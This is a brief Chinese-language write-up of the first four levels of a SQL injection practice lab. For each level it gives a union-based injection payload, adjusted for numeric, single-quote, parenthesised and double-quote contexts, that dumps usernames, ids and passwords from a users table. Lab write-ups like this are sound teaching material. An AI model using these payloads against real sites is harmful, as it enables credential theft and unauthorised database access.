进入靶场
1.第一关
先输入?id=1
再输入?id=2,发现内容不同,即输入的内容被带入到数据库里查询了
直接使用联合查询,
?id=-1' union select 1,2,group_concat(username ,id , password) from users--+
查询出数据库中全部的用户名、id和密码
2.第二关
数字型注入
直接
?id=-1 union select 1,2,group_concat(username ,id , password) from users
查询出用户名和密码
3.第三关
本关需要闭合单引号和考虑括号
直接
?id=-1') union select 1,2,group_concat(username ,id , password) from users--+
成功通关
4.第四关
本关sql语句是双引号且有括号
直接
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+
拿下拿下
先做到这吧~